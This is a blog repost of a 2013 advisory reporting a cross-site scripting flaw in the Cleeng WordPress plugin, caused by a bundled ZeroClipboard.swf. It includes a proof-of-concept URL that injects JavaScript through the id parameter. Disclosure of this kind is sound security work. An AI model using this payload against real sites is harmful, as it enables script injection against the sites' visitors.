» » » » »

Wordpress Plugins - Cleeng Content Monetization(Cleeng) <== XSS


##################################################
# Description : Wordpress Plugins - Cleeng Content Monetization(Cleeng) <== XSS
# Version : 2.3.2
# Date : 7/8/2013
# Author : Ryuzaki Lawlet / Fahmi Fisal @Justryuz (ryuzaki_l@y7mail.com)
##################################################

About:
Cleeng is a unique monetization solution that satisfies both publishers and users interests:
1- If you are musician, blogger, teachers, photographers or software developer, this free plug-in is made for you!

Vulnerabilities in the Cleeng Content Monetization(Cleeng) plugin for WordPress,
which can be exploited by malicious people to conduct cross-site scripting attacks.
The vulnerabilities are caused due to a bundled vulnerable version of ZeroClipboard.
Cross-Site Scripting vulnerabilities in ZeroClipboard(http://seclists.org/fulldisclosure/2013/Feb/103)
and in multiple web applications.

Affected products:
Vulnerable are all versions

Affected vendors:
Cleeng Content Monetization
http://cleeng.com / http://wordpress.org/plugins/cleeng/

Details:
Cross-Site Scripting (WASC-08):
XSS via id parameter and XSS via copying payload into clipboard

POC:
http://site/wp-content/plugins/cleeng/js/ZeroClipboard.swf?id=\"))}catch(e){}if(!self.a)self.a=!alert(/XSS/)//&width&height

Provided and/or discovered by:
Ryuzaki Lawlet / Fahmi Fisal @justryuz

Postingan terkait:

1 Comment , , , ,

1 Tanggapan untuk "Wordpress Plugins - Cleeng Content Monetization(Cleeng) <== XSS"

  1. SEOOctober 4, 2021 at 7:07 AM

    You made such an interesting piece to read, giving every subject enlightenment for us to gain knowledge. Thanks for sharing the such information with us to read this... WEBPROTIME

    ReplyDelete

Subscribe to: Post Comments (Atom)